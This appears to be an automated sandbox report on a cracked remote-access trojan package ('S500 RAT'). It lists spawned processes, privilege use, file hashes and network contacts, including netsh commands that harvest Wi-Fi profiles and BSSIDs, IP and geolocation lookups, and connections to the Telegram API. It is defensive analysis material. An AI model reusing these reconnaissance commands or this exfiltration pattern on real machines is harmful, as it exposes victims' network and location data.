N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 34 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 35 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 34 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 35 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2252 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 2252 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 2252 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 2580 wrote to memory of 2380 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe C:\Windows\system32\cmd.exe
PID 2580 wrote to memory of 2380 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe C:\Windows\system32\cmd.exe
PID 2580 wrote to memory of 2380 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe C:\Windows\system32\cmd.exe
PID 2580 wrote to memory of 2380 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe C:\Windows\system32\cmd.exe
PID 2380 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2380 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2380 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2380 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
PID 2380 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
PID 2380 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
PID 1360 wrote to memory of 2292 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 1360 wrote to memory of 2292 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 1360 wrote to memory of 2292 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 1360 wrote to memory of 2292 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 2292 wrote to memory of 1048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2292 wrote to memory of 1048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2292 wrote to memory of 1048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2292 wrote to memory of 1048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2292 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2292 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2292 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2292 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2292 wrote to memory of 900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2292 wrote to memory of 900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2292 wrote to memory of 900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2292 wrote to memory of 900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1360 wrote to memory of 1644 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 1360 wrote to memory of 1644 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 1360 wrote to memory of 1644 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 1360 wrote to memory of 1644 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1644 wrote to memory of 1204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1644 wrote to memory of 1204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1644 wrote to memory of 1204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1644 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1644 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1644 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1644 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe"

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe"

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C4A6.tmp\C4A7.tmp\C4B8.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

ServerRegistrationManager.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 icanhazip.com udp
US 104.16.185.241:80 icanhazip.com tcp
US 8.8.8.8:53 api.mylnikov.org udp
US 104.21.44.66:443 api.mylnikov.org tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Dlls\cgeoip.dll

MD5 6d6e172e7965d1250a4a6f8a0513aa9f
SHA1 b0fd4f64e837f48682874251c93258ee2cbcad2b
SHA256 d1ddd15e9c727a5ecf78d3918c17aee0512f5b181ad44952686beb89146e6bd0
SHA512 35daa38ad009599145aa241102bcd1f69b4caa55ebc5bb11df0a06567056c0ec5fcd02a33576c54c670755a6384e0229fd2f96622f12304dec58f79e1e834155

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Dlls\protobuf-net.dll

MD5 9fbb8cec55b2115c00c0ba386c37ce62
SHA1 e2378a1c22c35e40fd1c3e19066de4e33b50f24a
SHA256 9f01d9f2ed07e630ec078efa5d760762c3c8ad3b06e9e8a9062a37d63d57b026
SHA512 da0211d1c9ba0a59616bc15de80a1fed62b0405cad3b11ae4220ef1488c7837634aad67cbc8b484621a2a6288ef5e424cd816a2523bdb6167abcab76f3ac1a04

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Dlls\vestris.resourcelib.dll

MD5 944ce5123c94c66a50376e7b37e3a6a6
SHA1 a1936ac79c987a5ba47ca3d023f740401f73529b
SHA256 7da3f0e77c4dddc82df7c16c8c781fade599b7c91e3d32eefbce215b8f06b12a
SHA512 4c034ff51cc01567f3cb0796575528ca44623b864eb606266bcf955a9259ed26b20bec0086d79038158d3a5af2ada0a90f59d7c6aae9e545294fe77825dbe08b

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Forms\Form4.resx

MD5 0a4e049a213aef04a4b1fa145a76a752
SHA1 3603cb74a5883c3086cb483eb5ed2a1d452fbeb1
SHA256 203301e3afc69af0045e4c6d28920fdce85a678de2bb79f53dde11bc7df63d8f
SHA512 23ee1f3c0b8bd72f7a9c3e904f21b830d27ba5a80e77e3b08790fb7438180c9d9c287da22c84ea41cdf74aee71f1bcb187dd6ea50bdee45b88a3a5cfd7808016

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Forms\FormDOS.resx

MD5 5c43b1a8ce131be5e8271794ec520a54
SHA1 1d2f31f18ac0b543bab6a1f45ac2d388a6ad119a
SHA256 048b4c1bd3a6d8c36d30bab692e8b2b24c8ea7310ec7cfdbd5f73e65ec62b153
SHA512 4ffe82161a7a1578f8d0299115362c88fd7dec77fe08ab7ca886ae97eb0b064a3d1b7f0529b4708095bef4a278018e70a730f37a147edc338e0d61d31d3f40d6

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormRegValueEditMultiString.resources

MD5 beda8bbd2a72e45431cf5dd68f7c6e61
SHA1 18e28ada040e4c62e33d946046a9ccf66f839f0d
SHA256 f9f9c2a4855d61b7c7f93e9258d0306be802ef9c8c8929186deb71ee96b06d4c
SHA512 6287bb138431c33a2dd30b7c06c979ee89f691900eb407e14465d58188d04d7697ecc68eb6d479db664ea86f35b7ce6b611834028ddbd56513003c1ca28f0899

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormSendFileToMemory.resources

MD5 fa80841e3dc9ffb31dd5d015c1030172
SHA1 aa0d9e66db2a8528edf9931fe132f18870307216
SHA256 a5b9f5ccfe8ac46a630ac1cc112d343364fa2bc4a2bec0f3911322cff174cff9
SHA512 a38cc863d3c0c8d944340cd4116f03bbdb2f1526fb40b476cd0adbd444fd1dc10790d35eaf50ea34a1083b163baa82251a5048f075651bc14e46ac4cb82897bd

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.props

MD5 3108edc3f74d08bec485f1fc0aabab5b
SHA1 e1e14322ab3e69a69a7b0c9efd5b845a112320b8
SHA256 e785c6a42a443ab0b9fd7888d8d37ee280c833226d9a56e2e1840edebfa8f584
SHA512 750609750b366cdd1efd04035c742af2127d8341a22e4ce48c378f74a85414705e168f036df26f0095a82ce09142af52fbcd8a0227cc966d9c472c2f70a1907e

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.targets

MD5 3d9ef7c4c2db6e7631832825418a9ba6
SHA1 b2ac00b06d61c8498914ea52eaedaab01fae1a21
SHA256 6d1bba3214839a263b1c34c8668d7dc5ff2d0ee91cd4a1b01d251b7595ee94d7
SHA512 641939c4c1b7e61c90aa8ffaf9e3ac701c669a0d58ee85706f291197bacd2717451deb0fe95b4b9bb0daa56965fcdfcfe065decfcab657ac380b132887023035

C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe

MD5 27ca366a1d5c573827ffe735774b3948
SHA1 3c5b461746dfe30be57c9645f0f306df22934a29
SHA256 2b0cd717c200ba50563d065367955ecf4999dc708fcf80dd9862bb7a48672fab
SHA512 23ad694861f1a74afd8dd07bbc02f92b0a5fa5ba6b27eccd48d57ff415170f2187583dded882ec2ed9d390cab527ac5c8adedb9ae0d62021272626bbce6c92ee

C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe

MD5 87ca06f69c513f4fbbf67c5b4e366210
SHA1 7a0383ddd6f8ec2ec8624358ed0cd2ddc1a366aa
SHA256 42b6ecf01da5fc49e5d12229a52ddeb9901b13d62ac00a846aa748adb083f8e5
SHA512 286f3e8d46fe798b1e37823caea0e28811fb2e42a8e27669622a6477c353a7fe56f8e207ac9aa199df4ceac39ec9fd7bd77bdf01deac8ef448269916457d4acb

memory/1880-1252-0x00000000013D0000-0x00000000014F8000-memory.dmp

memory/1880-1253-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

memory/1880-1255-0x00000000004F0000-0x0000000000570000-memory.dmp

memory/1880-1256-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

MD5 aa2fc72b58059e5e7e9e7003ab466322
SHA1 e171576589134431baccb40d308e7dcbc776e087
SHA256 f107c0f275bd1c773e1ff2d78b60a4060b8353b02f45d3892968206fedffdf88
SHA512 26d69ad0d3f41bf08585307595e1d670c7d7905e1f86a566a36d9b0c836d3b349a6349e1f2885d433d35bd111f95ce004ae34e81443f96b73e784db3594e3eef

memory/2192-1259-0x000007FEF5940000-0x000007FEF632C000-memory.dmp

memory/2192-1260-0x00000000012B0000-0x0000000002374000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\Guna.UI2.dll

MD5 0f07705bd42d86d77dab085c42775244
SHA1 7e4b5c367183f4753a8d610e353c458c3def3888
SHA256 cf9b66e11506fa431849350c0cb58430a71e5ec943d2db9ef1b2e2302f299443
SHA512 851b1a4c470ee7fe07ce5619c16fd391428585926c5b559694a9e445633ea51ec86c74a3bbf3bce39d943c4bf714dad2fd3c4a4d0703be2333541c79a2ee97f0

memory/2192-1261-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2192-1263-0x000000001C5C0000-0x000000001C7B2000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe

MD5 604f8eb4afe0d9a9e3fb5f7981c09145
SHA1 92d44f43b4c9fc84b99ba34c5abb3672725ecc69
SHA256 682e2204557a05cddbaddef019cbc2eda6eaa50007f20851eadb9a33c35c458d
SHA512 cf35e1559004f48ed1ffbf5b78ae19861afb8e19a9979a49294da60f0f83ef7428bd3b5d09b869c6ce556141938d0d387deb350b10c0c9ca58087d384e4d3598

\Users\Admin\AppData\Local\Temp\c6ef4c2b-9a55-40b4-957b-c3cb74191397\GunaDotNetRT64.dll

MD5 9c43f77cb7cff27cb47ed67babe3eda5
SHA1 b0400cf68249369d21de86bd26bb84ccffd47c43
